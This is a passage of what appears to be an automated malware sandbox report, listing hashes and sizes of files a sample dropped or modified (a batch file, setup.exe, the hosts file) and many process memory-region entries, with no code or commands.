                                                        5a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d

                                                      • C:\Windows\Temp\run.bat
                                                        Filesize

                                                        98B

                                                        MD5

                                                        731afe244b2414169a5f630d52646e56

                                                        SHA1

                                                        e3771ccdccd8c306ee5fc4f264cfc3310690458c

                                                        SHA256

                                                        6c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552

                                                        SHA512

                                                        84e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1

                                                      • C:\Windows\Temp\setup.exe
                                                        Filesize

                                                        7.1MB

                                                        MD5

                                                        e5373f1e2c782659695c5cea587fddea

                                                        SHA1

                                                        4dc9dbcff89a50d1c75f956fb7d712d1d6181335

                                                        SHA256

                                                        c58788efe269e6cc57076e59cb2954c4fb791074353e091217a4b78a62592712

                                                        SHA512

                                                        2c42080ce4411e1ad81f1187992d649c0b057db87919785029368ed47d79d1507da9073f29522c0cc4539a2b87508dd89572efa53c0d9ee7a4052aa579517b79

                                                      • C:\Windows\Temp\setup.exe
                                                        Filesize

                                                        7.1MB

                                                        MD5

                                                        e5373f1e2c782659695c5cea587fddea

                                                        SHA1

                                                        4dc9dbcff89a50d1c75f956fb7d712d1d6181335

                                                        SHA256

                                                        c58788efe269e6cc57076e59cb2954c4fb791074353e091217a4b78a62592712

                                                        SHA512

                                                        2c42080ce4411e1ad81f1187992d649c0b057db87919785029368ed47d79d1507da9073f29522c0cc4539a2b87508dd89572efa53c0d9ee7a4052aa579517b79

                                                      • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
                                                        Filesize

                                                        539B

                                                        MD5

                                                        84f2160705ac9a032c002f966498ef74

                                                        SHA1

                                                        e9f3db2e1ad24a4f7e5c203af03bbc07235e704c

                                                        SHA256

                                                        7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93

                                                        SHA512

                                                        f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57

                                                      • C:\Windows\system32\drivers\etc\hosts
                                                        Filesize

                                                        1KB

                                                        MD5

                                                        f3f6968a4c0f457f427eb17f7cc5f68b

                                                        SHA1

                                                        872933578f4b7d555158189ed02015f192daa7c6

                                                        SHA256

                                                        774ad8ef51d495bfec8b3e3d058210d5ce715c66f76008f1e4f2b6203d33e41c

                                                        SHA512

                                                        5dafd8fb0cae325865c0a897e3719250903ac5da72b0fa5006ebda505ee625cd9eacf09c5043c3b3648a5677e96c87f1f2995712471cd1539cd9c73a7e3d0d49

                                                      • memory/8-574-0x0000000140000000-0x0000000140803000-memory.dmp
                                                        Filesize

                                                        8.0MB

                                                      • memory/8-575-0x0000000140000000-0x0000000140803000-memory.dmp
                                                        Filesize

                                                        8.0MB

                                                      • memory/64-341-0x0000000000000000-mapping.dmp
                                                      • memory/64-185-0x0000000000000000-mapping.dmp
                                                      • memory/220-559-0x0000000000000000-mapping.dmp
                                                      • memory/348-535-0x0000000000000000-mapping.dmp
                                                      • memory/348-363-0x0000000000000000-mapping.dmp
                                                      • memory/388-360-0x0000000000000000-mapping.dmp
                                                      • memory/648-366-0x0000000000000000-mapping.dmp
                                                      • memory/760-544-0x0000000000000000-mapping.dmp
                                                      • memory/852-582-0x000001FFD4830000-0x000001FFD4836000-memory.dmp
                                                        Filesize

                                                        24KB

                                                      • memory/852-585-0x000001FFD4100000-0x000001FFD4107000-memory.dmp
                                                        Filesize

                                                        28KB

                                                      • memory/860-337-0x0000000000000000-mapping.dmp
                                                      • memory/916-338-0x0000000000000000-mapping.dmp
                                                      • memory/984-543-0x0000000000000000-mapping.dmp
                                                      • memory/1156-567-0x0000000000000000-mapping.dmp
                                                      • memory/1208-342-0x0000000000000000-mapping.dmp
                                                      • memory/1332-538-0x0000000000000000-mapping.dmp
                                                      • memory/1384-351-0x0000000000000000-mapping.dmp
                                                      • memory/1480-282-0x0000000000400000-0x0000000001059000-memory.dmp
                                                        Filesize

                                                        12.3MB

                                                      • memory/1480-281-0x00007FFF8F1A0000-0x00007FFF8F37B000-memory.dmp
                                                        Filesize

                                                        1.9MB

                                                      • memory/1480-280-0x0000000000400000-0x0000000001059000-memory.dmp
                                                        Filesize

                                                        12.3MB

                                                      • memory/1480-242-0x00007FFF8F1A0000-0x00007FFF8F37B000-memory.dmp
                                                        Filesize

                                                        1.9MB

                                                      • memory/1480-181-0x0000000000000000-mapping.dmp
                                                      • memory/1480-189-0x0000000000400000-0x0000000001059000-memory.dmp
                                                        Filesize

                                                        12.3MB

                                                      • memory/1596-348-0x0000000000000000-mapping.dmp
                                                      • memory/1716-295-0x0000000000000000-mapping.dmp
                                                      • memory/2288-346-0x0000000000000000-mapping.dmp
                                                      • memory/2300-347-0x0000000000000000-mapping.dmp
                                                      • memory/2364-558-0x0000000000000000-mapping.dmp
                                                      • memory/2436-345-0x0000000000000000-mapping.dmp
                                                      • memory/2560-361-0x0000000000000000-mapping.dmp
                                                      • memory/2580-184-0x0000000000000000-mapping.dmp
                                                      • memory/2612-540-0x0000000000000000-mapping.dmp
                                                      • memory/2784-580-0x0000000000400000-0x000000000040C000-memory.dmp
                                                        Filesize

                                                        48KB

                                                      • memory/2784-568-0x0000000000400000-0x000000000040C000-memory.dmp
                                                        Filesize

                                                        48KB

                                                      • memory/2784-551-0x0000000000401BEA-mapping.dmp
                                                      • memory/2812-362-0x0000000000000000-mapping.dmp
                                                      • memory/2972-376-0x0000000000400000-0x0000000001059000-memory.dmp
                                                        Filesize

                                                        12.3MB

                                                      • memory/2972-377-0x00007FFF8F1A0000-0x00007FFF8F37B000-memory.dmp
                                                        Filesize

                                                        1.9MB

                                                      • memory/2972-374-0x0000000000400000-0x0000000001059000-memory.dmp
                                                        Filesize

                                                        12.3MB

                                                      • memory/2972-375-0x00007FFF8F1A0000-0x00007FFF8F37B000-memory.dmp
                                                        Filesize

                                                        1.9MB

                                                      • memory/2972-372-0x0000000000400000-0x0000000001059000-memory.dmp
                                                        Filesize

                                                        12.3MB

                                                      • memory/2972-373-0x00007FFF8F1A0000-0x00007FFF8F37B000-memory.dmp
                                                        Filesize

                                                        1.9MB

                                                      • memory/3132-364-0x0000000000000000-mapping.dmp
                                                      • memory/3164-157-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-125-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-170-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-173-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-174-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-175-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-176-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-178-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-179-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-171-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-169-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-163-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-165-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-167-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-168-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-180-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-166-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-164-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-177-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-162-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-161-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-160-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-159-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-118-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-119-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-158-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-120-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-121-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-122-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-123-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-124-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-138-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-117-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-127-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-156-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-126-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-155-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-154-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-128-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-130-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-129-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-131-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-153-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-172-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-152-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-151-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-132-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-150-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-149-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-133-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-148-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-146-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-134-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-147-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-145-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-144-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-135-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-136-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-137-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-139-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-142-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-143-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-141-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3164-140-0x00000000774F0000-0x000000007767E000-memory.dmp
                                                        Filesize

                                                        1.6MB

                                                      • memory/3312-549-0x0000000000000000-mapping.dmp
                                                      • memory/3328-557-0x0000000000000000-mapping.dmp
                                                      • memory/3500-565-0x0000000000000000-mapping.dmp
                                                      • memory/3612-339-0x0000000000000000-mapping.dmp
                                                      • memory/3688-349-0x0000000000000000-mapping.dmp
                                                      • memory/3952-344-0x0000000000000000-mapping.dmp
                                                      • memory/3964-542-0x0000000000000000-mapping.dmp
                                                      • memory/3968-343-0x0000000000000000-mapping.dmp
                                                      • memory/4064-358-0x0000000000000000-mapping.dmp
                                                      • memory/4088-539-0x0000000000000000-mapping.dmp
                                                      • memory/4088-340-0x0000000000000000-mapping.dmp
                                                      • memory/4148-352-0x0000000000000000-mapping.dmp
                                                      • memory/4156-564-0x0000000000000000-mapping.dmp
                                                      • memory/4164-307-0x00000250C8980000-0x00000250C89F6000-memory.dmp
                                                        Filesize

                                                        472KB

                                                      • memory/4164-359-0x0000000000000000-mapping.dmp
                                                      • memory/4164-302-0x00000250AE500000-0x00000250AE522000-memory.dmp
                                                        Filesize

                                                        136KB

                                                      • memory/4164-296-0x0000000000000000-mapping.dmp
                                                      • memory/4280-556-0x0000000000000000-mapping.dmp
                                                      • memory/4404-563-0x0000000000000000-mapping.dmp
                                                      • memory/4604-368-0x0000000000000000-mapping.dmp
                                                      • memory/4648-388-0x0000000000000000-mapping.dmp
                                                      • memory/4668-548-0x0000020EEEAF0000-0x0000020EEEAF6000-memory.dmp
                                                        Filesize

                                                        24KB

                                                      • memory/4668-560-0x0000020EEEDD0000-0x0000020EEEDE2000-memory.dmp
                                                        Filesize

                                                        72KB

                                                      • memory/4668-350-0x0000000000000000-mapping.dmp
                                                      • memory/4732-354-0x0000000000000000-mapping.dmp
                                                      • memory/4736-545-0x0000000000000000-mapping.dmp
                                                      • memory/4772-546-0x0000000000000000-mapping.dmp
                                                      • memory/4780-357-0x0000000000000000-mapping.dmp
                                                      • memory/4804-536-0x0000000000000000-mapping.dmp
                                                      • memory/4812-336-0x0000000000000000-mapping.dmp
                                                      • memory/4824-356-0x0000000000000000-mapping.dmp
                                                      • memory/4896-566-0x0000000000000000-mapping.dmp
                                                      • memory/4912-335-0x0000000000000000-mapping.dmp
                                                      • memory/4984-288-0x000001E96F2D0000-0x000001E96F6EC000-memory.dmp
                                                        Filesize

                                                        4.1MB

                                                      • memory/4984-287-0x000001E9543A0000-0x000001E9547BC000-memory.dmp
                                                        Filesize

                                                        4.1MB

                                                      • memory/5040-547-0x0000000000000000-mapping.dmp
                                                      • memory/5044-541-0x0000000000000000-mapping.dmp
                                                      • memory/5056-561-0x0000000000000000-mapping.dmp
                                                      • memory/5104-353-0x0000000000000000-mapping.dmp
                                                      • memory/5108-365-0x0000000000000000-mapping.dmp
                                                      • memory/5116-405-0x0000029064C60000-0x0000029064C7C000-memory.dmp
                                                        Filesize

                                                        112KB

                                                      • memory/5116-444-0x0000029064C80000-0x0000029064C8A000-memory.dmp
                                                        Filesize

                                                        40KB

                                                      • memory/5116-411-0x0000029065160000-0x0000029065219000-memory.dmp
                                                        Filesize

                                                        740KB

                                                      • memory/5116-389-0x0000000000000000-mapping.dmp
                                                      • memory/5116-355-0x0000000000000000-mapping.dmp